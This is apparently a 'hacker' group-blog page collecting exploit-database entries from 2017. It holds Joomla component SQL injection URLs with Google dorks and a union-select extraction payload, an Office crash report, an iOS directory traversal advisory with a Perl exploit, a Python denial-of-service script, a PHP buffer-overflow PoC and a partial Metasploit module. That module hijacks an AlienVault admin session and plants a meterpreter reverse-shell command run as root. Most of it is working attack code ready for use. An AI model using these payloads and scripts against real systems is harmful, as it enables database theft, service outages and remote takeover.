# # # # #
# Exploit Title: Joomla! Component Team Display v1.2.1 - SQL Injection
# Google Dork: inurl:index.php?option=com_teamdisplay
# Date: 17.02.2017
# Vendor Homepage: http://addonstreet.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/vertical-markets/thematic-directory/team-display/
# Demo: http://addonstreet.com/demo/teamdisplay/
# Version: 1.2.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_teamdisplay&view=members&filter_category=[SQL]
# # # # #
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863152337
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# # # # #
# Exploit Title: Joomla! Component Groovy Gallery v1.0.0 - SQL Injection
# Google Dork: inurl:index.php?option=com_groovygallery
# Date: 17.02.2017
# Vendor Homepage: http://addonstreet.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/photos-a-images/galleries/groovy-gallery/
# Demo: http://addonstreet.com/products/groovy-gallery
# Version: 1.0.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_groovygallery&view=images&filter_category=[SQL]
# http://localhost/[PATH]/index.php?option=com_groovygallery&view=images&groovy_category=[SQL]
# # # # #
# # # # #
# Exploit Title: Joomla! Component WMT Content Timeline v1.0 - SQL Injection
# Google Dork: inurl:index.php?option=com_wmt_content_timeline
# Date: 17.02.2017
# Vendor Homepage: http://devecostudio.com
# Software Buy: https://extensions.joomla.org/extensions/extension/news-display/articles-display/wmt-content-timeline/
# Demo: http://joomla.devecostudio.com/9-wmt-content-timeline-joomla-module.html
# Version: 1.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_wmt_content_timeline&task=returnArticle&id=[SQL]
# -66666+/*!50000union*/+select+1,2,3,4,5,6,7,8,9,10,0x496873616e2053656e63616e203c62723e207777772e696873616e2e6e6574,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),13,14,15--+-
# # # # #
# # # # #
# Exploit Title: Joomla! Component Joomloc-CAT v4.1.3 - SQL Injection
# Google Dork: inurl:index.php?option=com_joomloc
# Date: 18.02.2017
# Vendor Homepage: http://www.joomloc.fr.nf/
# Software Buy: https://extensions.joomla.org/extensions/extension/vertical-markets/booking-a-reservations/joomloc-cat/
# Demo: http://www.joomloc.fr.nf/joomlocprocmpms/
# Version: 4.1.3
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_joomloc&view=engine&layout=geo&liste=65&place=dep&ville=[SQL]
# # # # #
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=949
Platform: Microsoft Office 2010 on Windows 7 x86
Class: heap memory corruption
The following crash was observed in Microsoft Office 2010 running under Windows 7 x86 with Application Verifier enabled. This crash appeared to be non-deterministic depending on memory layout and will not reproduce in all instances but the crash demonstrated a high degree of reliability.
Attached files:
2581805226.ppt: fuzzed crashing file
File versions:
mso.dll: 14.0.7173.5000
gfx.dll: 14.0.7104.5000
oart.dll: 14.0.7169.5000
riched20.dll: 14.0.7155.5000
msptls.dll: 14.0.7164.5000
((7ac.a64): Access violation - code c0000005 (first chance)
eax=200bcf3a ebx=1febce30 ecx=1febce2c edx=77cf6b01 esi=1febce34 edi=1febce18
eip=66a19941 esp=0027008c ebp=002700d8 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
mso!Ordinal5429+0x376:
66a19941 0fb708 movzx ecx,word ptr [eax] ds:0023:200bcf3a=????
66a1993c 8b4104 mov eax,dword ptr [ecx+4] ; Length 0x00200122
66a1993f 03c7 add eax,edi
=> 66a19941 0fb708 movzx ecx,word ptr [eax] ds:0023:200bcf3a=????
66a19944 894dfc mov dword ptr [ebp-4],ecx
66a19947 8a55fd mov dl,byte ptr [ebp-3]
66a1994a 8855fc mov byte ptr [ebp-4],dl
66a1994d 884dfd mov byte ptr [ebp-3],cl
66a19950 66837dfc04 cmp word ptr [ebp-4],4
66a19955 0f85e0010000 jne mso!Ordinal5429+0x570 (66a19b3b)
66a1995b 8a08 mov cl,byte ptr [eax]
66a1995d 8a5001 mov dl,byte ptr [eax+1]
66a19960 8810 mov byte ptr [eax],dl
66a19962 884801 mov byte ptr [eax+1],cl
0:000> kb
ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
002700d8 66a19527 20099000 0000c000 2e010b53 mso!Ordinal5429+0x376
002701ac 66a19348 1febefa0 042109c7 042109c7 mso!Ordinal10199+0x2138
002701c8 66a192a9 00270240 042109c7 00000001 mso!Ordinal10199+0x1f59
00270288 66a18c32 042109c7 0027038c 00000004 mso!Ordinal10199+0x1eba
00270474 66a18bb5 042109c7 1feeaff8 00000002 mso!Ordinal10199+0x1843
00270498 6b256c34 042109c7 1feeaff8 00000002 mso!Ordinal10199+0x17c6
002704bc 6b2570e0 042109c7 1feeaff8 00000002 gfx!Ordinal980+0xa2
00270570 6b256bd4 0b558dc8 1feeaff8 00000002 gfx!Ordinal818+0x306
002705bc 67821180 002705fc 1feeaff8 00000002 gfx!Ordinal980+0x42
0027061c 67820b5a 00000002 1ba92e18 1feeaff8 oart!Ordinal2842+0xb6c
00270690 6781fed8 00000000 001f2ff0 00270924 oart!Ordinal2842+0x546
002706e0 61c2000c 00270724 00000000 00000000 oart!Ordinal7653+0x7d3
00270878 61c1f736 002708a8 00000000 00000064 riched20!RichListBoxWndProc+0x50da
002708b0 61c1edb1 00000000 0000ffff 00000000 riched20!RichListBoxWndProc+0x4804
002709a0 61c1e7ba 00000000 00000001 00000000 riched20!RichListBoxWndProc+0x3e7f
002709d4 6aa75d8c 0a7c1c38 00000000 00000000 riched20!RichListBoxWndProc+0x3888
00270a54 6aa6ef12 1f9b4ef8 00000000 00270c2c MSPTLS!LssbFIsSublineEmpty+0x16269
00270c5c 6aa54c98 0a7c3a78 00000000 00004524 MSPTLS!LssbFIsSublineEmpty+0xf3ef
00270c90 61c1c803 0a7c3a78 00000000 00004524 MSPTLS!LsCreateLine+0x23
00270db0 61c1c659 00000003 00000000 ffffffff riched20!RichListBoxWndProc+0x18d1
00270e08 61c0f36a 00271770 00000003 00000000 riched20!RichListBoxWndProc+0x1727
In this crash eax is pointing to an invalid memory region and is being dereferenced causing an access violation. There is a clear path to an out of bounds memory write shortly after the current crashing instruction. The value in eax came from edi + [ecx+4]. The value in [ecx+4] appears to a length with a single bit flipped, 0x00200122 instead of 0x00000122. The heap chunk allocated for this came from:
0:000> !heap -p -a 0x1febce18
address 1febce18 found in
_DPH_HEAP_ROOT @ 71000
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
1feb171c: 1febce18 1e2 - 1febc000 2000
6eac8e89 verifier!AVrfDebugPageHeapAllocate+0x00000229
77d7616e ntdll!RtlDebugAllocateHeap+0x00000030
77d3a08b ntdll!RtlpAllocateHeap+0x000000c4
77d05920 ntdll!RtlAllocateHeap+0x0000023a
6fcdad1a vrfcore!VerifierSetAPIClassName+0x000000aa
6fc816ac vfbasics+0x000116ac
67080c59 mso!Ordinal9770+0x000078e2
66a19527 mso!Ordinal10199+0x00002138
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41417.zip
Document Title:
===============
Album Lock v4.0 iOS - Directory Traversal Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2033
Release Date:
=============
2017-02-20
Vulnerability Laboratory ID (VL-ID):
====================================
2033
Common Vulnerability Scoring System:
====================================
7.2
Product & Service Introduction:
===============================
Do you have any secret photo and videos in your iPhone? Album Lock can protect your privacy perfectly. Album is the most
convenient private Photo&Video App! You can add your SPECIAL photos&videos into AlbumLock, we provides many convenient ways.
From Photo App(Camera Roll), iTunes File Sharing Sync, WiFi Transfer and in App Camera.
(Copy of the Homepage: https://itunes.apple.com/us/app/album-lock-lock-secret-photo/id851608952 )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a directory traversal web vulnerability in the official Album Lock v4.0 ios mobile application.
Vulnerability Disclosure Timeline:
==================================
2017-02-20: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
A directory traversal web vulnerability has been dsicovered in the official Album Lock v4.0 iOS mobile web-application.
The issue allows an attackers to unauthorized request and download local application files by manipulation of path parameters.
The directory traversal web vulnerability is located in the `filePaht` parameter of the wifi web-server interface. Remote attackers
are able to request the local web-server during the sharing process to access unauthenticated application files. Attackers are able
to request via `getObject` image path variables to access or download files. Remote attackers are able to access the root `document`
path of the application. The request method to execute is GET and the attack vector is located on the client-side of the web-server
web-application. Finally an attacker is able to access with the credentials the service by using a client via http protocol.
The security risk of the directory traversal vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 7.2.
Exploitation of the web vulnerability requires no privilege web-application user account or user interaction. Successful exploitation of the
vulnerability results in information leaking, mobile application compromise by unauthorized and unauthenticated access.
Request Method(s):
[+] GET
Vulnerable Module(s):
[+] getObject
Vulnerable Parameter(s):
[+] filePaht
Affected Module(s):
[+] Web-Server File System
Proof of Concept (PoC):
=======================
The security vulnerability can be exploited by remote attackers without user interaction or privilege web-application user account.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
Standard Request:
http://localhost:8880/getImage?filePaht=/var/mobile/Containers/Data/Application/FD29A0B7-9931-4A7F-A9AA-3942B539DC8C/Documents/._alias_images/fhhjjj/picture-00001.png
PoC: Payload
/var/mobile/Containers/Data/Application/FD29A0B7-9931-4A7F-A9AA-3942B539DC8C./../../../Application
Malicious Request: Exploitation
http://localhost:8880/getImage?filePaht=/var/mobile/Containers/Data/Application/FD29A0B7-9931-4A7F-A9AA-3942B539DC8C/Documents/
http://localhost:8880/getImage?filePaht=/var/mobile/Containers/Data/Application/
http://localhost:8880/getImage?filePaht=/var/mobile/
PoC: Exploit
use strict;
use LWP::UserAgent;
my $b = LWP::UserAgent->new();
my $host = "1.1.1.1:5555";
print $b->get("http://".$host."/getImage?filePaht=/var/mobile/Containers/Data/Application/FD29A0B7-9931-4A7F-A9AA-3942B539DC8C/config.dat")->content;
--- PoC Session Logs [GET] ---
Status: 200[OK]
GET http://localhost:8880/getImage?filePaht=/var/mobile/Containers/Data/Application/FD29A0B7-9931-4A7F-A9AA-3942B539DC8C./../../../Application
Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8880]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0]
Accept[*/*]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Referer[http://localhost:8880/list_gif.html?folder=/var/mobile/Containers/Data/Application/FD29A0B7-9931-4A7F-A9AA-3942B539DC8C/]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Reference(s):
http://localhost:8880/
http://localhost:8880/getImage
http://localhost:8880/getImage?filePaht=
http://localhost:8880/list_gif.html
http://localhost:8880/list_gif.html?folder=
Solution - Fix & Patch:
=======================
The vulnerability can be patch by disallowing the filepaht parameter to request upper local paths outside the document folder.
Include a whitelist of allowed requested path and setup a secure exception to prevent on exploitation.
Security Risk:
==============
The security risk of the directory traversal web vulnerability in the mobile application is estimated as high. (CVSS 7.2)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.)
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get a ask permission.
Copyright © 2017 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
# # # # #
# Exploit Title: Joomla! Component MediaLibrary Basic v3.5 - SQL Injection
# Google Dork: inurl:index.php?option=com_booklibrary
# Date: 22.02.2017
# Vendor Homepage: http://ordasoft.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/living/education-a-culture/medialibrary-basic/
# Demo: http://ordasvit.com/joomla-media-library/
# Version: 3.5
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php/medialibrary/media/all-books/all-books/345/view/book/19[SQL]/Ihsan_Sencan
# http://localhost/[PATH]/index.php/medialibrary/media/all-books/all-books/345/lend_request?mid[0]=[SQL]
# # # # #
# # # # #
# Exploit Title: Joomla! Component BookLibrary v3.6.1 - SQL Injection
# Google Dork: inurl:index.php?option=com_booklibrary
# Date: 22.02.2017
# Vendor Homepage: http://ordasoft.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/living/education-a-culture/booklibrary-basic/
# Demo: http://ordasvit.com/joomla-book-library
# Version: 3.6.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_booklibrary&task=suggestion&comment=[SQL]
# http://localhost/[PATH]/index.php/component/booklibrary/0/search?searchtext=[SQL]&author=on&title=on&isbn=on'&bookid=on&description=on&publisher=on&pricefrom=19&priceto=287.9&catid=0&option=com_booklibrary&task=search&Itemid=207
# # # # #
# # # # #
# Exploit Title: Joomla! Component RealEstateManager v3.9 - SQL Injection
# Google Dork: inurl:index.php?option=com_realestatemanager
# Date: 22.02.2017
# Vendor Homepage: http://ordasoft.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/vertical-markets/real-estate/realestatemanager-basic/
# Demo: http://ordasvit.com/joomla-real-estate-manager/
# Version: 3.9
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php/realestate/all-houses/all-houses-default/160/search?searchtext=a&catid=all&search_date_from=2017-02-21&search_date_until=2017-02-28&pricefrom2=114019&priceto2=750000&listing_type=all&listing_status=[SQL]
# http://localhost/[PATH]/index.php/realestate/all-houses/all-houses-default/160/search?searchtext=a&catid=all&search_date_from=2017-02-21&search_date_until=2017-02-28&pricefrom2=114019&priceto2=750000&listing_type=[SQL]
# # # # #
# # # # #
# Exploit Title: Joomla! Component VehicleManager v3.9 - SQL Injection
# Google Dork: inurl:index.php?option=com_vehiclemanager
# Date: 22.02.2017
# Vendor Homepage: http://ordasoft.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/vertical-markets/vehicles/vehiclemanager-basic/
# Demo: http://ordasvit.com/joomla-vehicle-manager/
# Version: 3.9
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_vehiclemanager&Itemid=70&task=search&submit=Search&catid=0&maker=&fuel_type=all&model=all&listing_type=all&transmission=all&vcondition=[SQL]
# http://localhost/[PATH]/index.php?option=com_vehiclemanager&Itemid=70&task=search&submit=Search&catid=0&maker=&fuel_type=all&model=all&listing_type=all&transmission=[SQL]
# http://localhost/[PATH]/index.php?option=com_vehiclemanager&Itemid=70&task=search&submit=Search&catid=0&maker=&fuel_type=all&model=all&listing_type=[SQL]
# http://localhost/[PATH]/index.php?option=com_vehiclemanager&Itemid=70&task=search&submit=Search&catid=0&maker=&fuel_type=all&model=[SQL]
# http://localhost/[PATH]/index.php?option=com_vehiclemanager&Itemid=70&task=search&submit=Search&catid=0&maker=&fuel_type=[SQL]
# http://localhost/[PATH]/index.php?option=com_vehiclemanager&Itemid=70&task=search&submit=Search&catid=0&maker=[SQL]
# # # # #
# # # # #
# Exploit Title: Joomla! Component ContentMap v1.3.8 - SQL Injection
# Google Dork: inurl:index.php?option=com_contentmap
# Date: 22.02.2017
# Vendor Homepage: https://www.turismo.eu/
# Software Buy: https://extensions.joomla.org/extensions/extension/maps-a-weather/geotagging/contentmap/
# Demo: https://www.turismo.eu/itinerari.html
# Version: 1.3.8
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_contentmap&owner=plugin&view=smartloader&id=10135&Itemid=606&type=json&filename=articlesmarkers&source=article&contentid=[SQL]
# # # # #
[+] Credits: John Page AKA Hyp3rlinX
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/EASYCOM-SQL-IPLUG-DENIAL-OF-SERVICE.txt
[+] ISR: ApparitionSec
Vendor:
================
easycom-aura.com
Product:
===========
SQL iPlug
EasycomPHP_4.0029.iC8im2.exe
SQL iPlug provides System i applications real-time access to heterogeneous and external databases
(Oracle, SQL Server, MySQL, MS Access, Sybase, Progress) in a completely transparent manner and without requiring replication.
Vulnerability Type:
===================
Denial Of Service
CVE Reference:
==============
CVE-2017-5359
Security Issue:
================
SQL iPlug listens on port 7078 by default, it suffers from denial of service when sending overly long string via
HTTP requests fed to the "D$EVAL" parameter.
Exploit/POC:
============
import socket
print 'EasyCom SQL-IPLUG DOS 0day!'
print 'hyp3rlinx'
IP = raw_input("[IP]> ")
PORT = 7078
payload="A"*43000
arr=[]
c=0
while 1:
try:
arr.append(socket.create_connection((IP,PORT)))
arr[c].send('GET /?D$EVAL='+payload+" HTTP/1.1\r\n\r\n")
c+=1
print "doit!"
except socket.error:
print "[*] 5th ave 12:00"
raw_input()
break
Disclosure Timeline:
======================================
Vendor Notification: December 22, 2016
Vendor acknowledgement: December 23, 2016
Vendor Release Fix/Version February 20, 2017
February 22, 2017 : Public Disclosure
Network Access:
===============
Remote
Severity:
===========
Medium
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere.
[+] Credits: John Page AKA Hyp3rlinX
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/EASYCOM-PHP-API-BUFFER-OVERFLOW.txt
[+] ISR: ApparitionSec
Vendor:
================
easycom-aura.com
Product:
===========================
EASYCOM AS400 (iBMI) PHP API
EasycomPHP_4.0029.iC8im2.exe
EASYCOM is the middleware which provides native access to IBMi data and programs. With its excellent performance and strict compliance
with IBMi security regulations, this technology facilitates development of Internet, mobile and client/server applications in
Windows, Linux, and IBMi.
EasyCom tested here requires older version of PHP.
Setup test environment:
Windows 7
XAMPP 1.7.3
PHP 5.3.1 (cli) (built: Nov 20 2009 17:26:32)
Copyright (c) 1997-2009 The PHP Group
Zend Engine v2.3.0
PHP compiled module API=20090626 (need to use for EasyCom IBM DLL)
Vulnerability Type:
=========================
API Stack Buffer Overflow
CVE Reference:
==============
CVE-2017-5358
Security Issue:
================
EasyCom PHP API suffers from multiple Buffer Overflow entry points, which can result in arbitrary code execution on affected system.
Below I provide some proof of concept details for a few of them.
EAX 00000000
ECX 41414141
EDX 771D6ACD ntdll.771D6ACD
EBX 00000000
ESP 00C0F238
EBP 00C0F258
ESI 00000000
EDI 00000000
EIP 41414141
C 0 ES 002B 32bit 0(FFFFFFFF)
P 1 CS 0023 32bit 0(FFFFFFFF)
A 0 SS 002B 32bit 0(FFFFFFFF)
Z 1 DS 002B 32bit 0(FFFFFFFF)
S 0 FS 0053 32bit 7EFDD000(FFF)
T 0 GS 002B 32bit 0(FFFFFFFF)
D 0
O 0 LastErr ERROR_SUCCESS (00000000)
EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
SEH chain of main thread
Address SE handler
00C0F354 kernel32.7600410E
00C0FF78 42424242
52525252 *** CORRUPT ENTRY ***
WinDbg dump...
(720.a70): Access violation - code c0000005 (first/second chance not available)
*** ERROR: Symbol file could not be found. Defaulted to export symbols for ntdll.dll -
eax=00000000 ebx=00000000 ecx=41414141 edx=77316acd esi=00000000 edi=00000000
eip=41414141 esp=004111e8 ebp=00411208 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
41414141 ?? ???
0:000> !load winext/msec
0:000> !exploitable
!exploitable 1.6.0.0
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - Data Execution Prevention Violation starting at Unknown Symbol @ 0x0000000041414141
called from ntdll!RtlDosSearchPath_Ustr+0x0000000000000ada (Hash=0x05cdf8a7.0xce7d7411)
User mode DEP access violations are exploitable.
PHP Crash:
=============
Problem signature:
Problem Event Name: BEX
Application Name: php.exe
Application Version: 5.3.1.0
Application Timestamp: 4b06c430
Fault Module Name: StackHash_e98d
Fault Module Version: 0.0.0.0
Fault Module Timestamp: 00000000
Exception Offset: 41414141
Exception Code: c0000005
Exception Data: 00000008
OS Version: 6.1.7601.2.1.0.256.48
Exploit/POC:
===============
php_Easycom5_3_0.dll 0day vuln POC minus the exploit, I'm bored goin to the park.
<?php
/* Basic connection to an AS400 iBMI System */
$payload=str_repeat("A", 4000); #BOOM!
$payload=str_repeat("A",1868)."RRRRBBBB".str_repeat("\x90",100); #SEH
$conn = i5_connect($payload, "QPGMR", "PASSW") or die(i5_errormsg()); #VULN
$conn = i5_pconnect($payload, 'QSECOFR', 'password', array() ); #VULN
$conn = i5_private_connect($payload, $user, $password, array()); #VULN
echo 'EasyCom PHP API 0day ' . $conn;
?>
Network Access:
===============
Remote
Severity:
==========
High
Disclosure Timeline:
======================================
Vendor Notification: December 22, 2016
Vendor acknowledgement: December 23, 2016
Vendor Release Fix/Version February 20, 2017
February 22, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere.
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::SSH
def initialize(info={})
super(update_info(info,
'Name' => "AlienVault OSSIM/USM Remote Code Execution",
'Description' => %q{
This module exploits object injection, authentication bypass and ip spoofing vulnerabities all together.
Unauthenticated users can execute arbitrary commands under the context of the root user.
By abusing authentication bypass issue on gauge.php lead adversaries to exploit object injection vulnerability
which leads to SQL injection attack that leaks an administrator session token. Attackers can create a rogue
action and policy that enables to execute operating system commands by using captured session token. As a final step,
SSH login attempt with a invalid credentials can trigger a created rogue policy which triggers an action that executes
operating system command with root user privileges.
This module was tested against following product and versions:
AlienVault USM 5.3.0, 5.2.5, 5.0.0, 4.15.11, 4.5.0
AlienVault OSSIM 5.0.0, 4.6.1
},
'License' => MSF_LICENSE,
'Author' =>
[
'Peter Lapp', # EDB advisory owner
'Mehmet Ince <mehmet@mehmetince.net>' # Metasploit module
],
'References' =>
[
['URL', 'https://pentest.blog/unexpected-journey-into-the-alienvault-ossimusm-during-engagement/'],
['EDB', '40682']
],
'DefaultOptions' =>
{
'SSL' => true,
'WfsDelay' => 10,
'Payload' => 'python/meterpreter/reverse_tcp'
},
'Platform' => ['python'],
'Arch' => ARCH_PYTHON,
'Targets' =>
[
['Alienvault USM/OSSIM <= 5.3.0', {}]
],
'Privileged' => true,
'DisclosureDate' => "Jan 31 2017",
'DefaultTarget' => 0
))
register_options(
[
Opt::RPORT(443),
OptString.new('TARGETURI', [true, 'The URI of the vulnerable Alienvault OSSIM instance', '/'])
], self.class)
end
def check
r = rand_text_alpha(15)
p = "a:1:{s:4:\"type\";s:69:\"1 AND extractvalue(rand(),concat(0x3a,(SELECT '#{r}')))-- \";}"
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'ossim', 'dashboard', 'sections', 'widgets', 'data', 'gauge.php'),
'headers' => {
'User-Agent' => 'AV Report Scheduler',
},
'vars_get' => {
'type' => 'alarm',
'wtype' => 'foo',
'asset' => 'ALL_ASSETS',
'height' => 1,
'value' => p
}
})
if res && res.code == 200 && res.body =~ /XPATH syntax error: ':#{r}'/
Exploit::CheckCode::Vulnerable
else
Exploit::CheckCode::Safe
end
end
def exploit
# Hijacking Administrator session by exploiting objection injection vuln that end up with sqli
print_status("Hijacking administrator session")
sql = "SELECT id FROM sessions LIMIT 1"
p = "a:1:{s:4:\"type\";s:#{(sql.length + 58).to_s}:\"1 AND extractvalue(rand(),concat(0x3a3a3a,(#{sql}),0x3a3a3a))-- \";}"
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'ossim', 'dashboard', 'sections', 'widgets', 'data', 'gauge.php'),
'headers' => {
'X-Forwarded-For' => rhost.to_s,
'User-Agent' => 'AV Report Scheduler',
},
'vars_get' => {
'type' => 'alarm',
'wtype' => 'foo',
'asset' => 'ALL_ASSETS',
'height' => 1,
'value' => p
}
})
if res && res.code == 200 && res.body =~ /XPATH syntax error: ':::(.*):::'/
admin_session = $1
cookie = "PHPSESSID=#{admin_session}"
print_good("Admin session token : #{cookie}")
else
fail_with(Failure::Unknown, "Session table is empty. Wait until someone logged in and try again")
end
# Creating a Action that contains payload.
print_status("Creating rogue action")
r = rand_text_alpha(15)
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'ossim', 'action', 'modifyactions.php'),
'cookie' => cookie,
'headers' => {
'X-Forwarded-For' => rhost.to_s,
},
'vars_post' => {
'id' => '',
'action' => 'new',
'old_name' => '',
'action_name' => r,
'ctx' => '',
'old_descr' => '',
'descr' => r,
'action_type' => '2',
'only' => 'on',
'cond' => 'True',
'email_from' => '',
'email_to' => 'email;email;email',
'email_subject' => '',
'email_message' => '',
'transferred_user' => '',
'transferred_entity' => '',
'exec_command' => "python -c \"#{payload.encoded}\""
}
})
if res && res.code == 200 && res.body.include?("Action successfully updated")
print_good("Action created: #{r}")
else
fail_with(Failure::Unknown, "Unable to create action")
end
# Retrieving the policy id. Authentication Bypass with User-Agent Doesn't work for this endpoint.
# Thus we're using hijacked administrator session.
print_status("Retrieving rogue action id")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "ossim", "action", "getaction.php"),
'cookie' => cookie,
'headers' => {
'X-Forwarded-For' => rhost.to_s,
},
'vars_get' => {
'page' => '1',
'rp' => '2000'
}
})
if res && res.code == 200 && res.body =~ /actionform\.php\?id=(.*)'>#{r}<\/a>/
action_id = $1
print_good("Corresponding Action ID found: #{action_id}")
else
fail_with(Failure::Unknown, "Unable to retrieve action id")
end
# Retrieving the policy data. We will use it while creating policy
print_status("Retrieving policy ctx and group values")
res = send_request_cgi({
